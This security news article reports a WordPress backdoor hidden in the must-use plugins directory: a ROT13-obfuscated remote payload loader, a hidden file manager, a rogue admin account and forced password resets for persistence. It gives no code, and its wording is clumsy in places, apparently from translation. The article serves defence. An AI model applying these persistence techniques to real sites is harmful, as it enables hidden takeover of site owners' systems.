Cybersecurity researchers discover new stealth backdoors hidden within the “Mu-Plugins” directory of WordPress sites, grant threat access and allow any action to be performed.
Required plugins (aka MU-Plugins) are special plugins that are automatically activated on all WordPress sites in your installation. By default, it is located in the “WP-Content/Mu-Plugins” directory.
What makes them attractive to attackers is that MU-Plugin doesn’t appear in the default list of plugins on the WP-Admin plugin page and cannot be disabled except that it removes plugin files from required directories.
As a result, some malware that utilizes this technique can function quietly without raising a red flag.
In the infectious disease discovered by web security company Sucuri, a PHP script in the Mu-Plugins directory (“WP-Index.php”) acts as a loader and stores it in the WordPress database in the WP_OPTIONS table under _HDRA_CORE.
The remote payload is taken from an obfuscated URL using ROT13. This is a simple replacement cipher that replaces a character with the 13th character (i.e. a becomes n, b, and c becomes p).
“The fetched content is then temporarily written to disk and executed,” said security researcher Puja Srivastava. “This backdoor provides attackers with permanent access to the site and the ability to run PHP code remotely.
Specifically, it injects the Hidden File Manager into the theme directory as “Pricing-Table-3.Php” and allows threat actors to view, upload, or delete files. You also create an admin user named “Official WP” and download and activate the malicious plugin (“WP-Bot-protect.php”).
In addition to revive the infection in the event of deletion, the malware also includes the ability to change the passwords for common administrator usernames such as “Admin”, “Root”, and “WPSupport” in the default password set by the attacker. This also extends to its own “official WP” users.
In doing so, threat actors enjoy permanent access to the site, take malicious actions, and effectively lock other administrators. This ranges from data theft to inserting code that can serve the malware, redirecting visitors to the site.
“Attackers get full admin access and permanent backdoors, allowing the site to do anything from installing more malware to taint it,” says Srivastava. “The characteristics of remote command execution and content injection mean that attackers can change the behavior of the malware.”
To mitigate these threats, it is essential for site owners to regularly update WordPress, themes and plugins, secure their accounts using two-factor authentication, and regularly audit all sections of the site, including themes and plugin files.
Source link
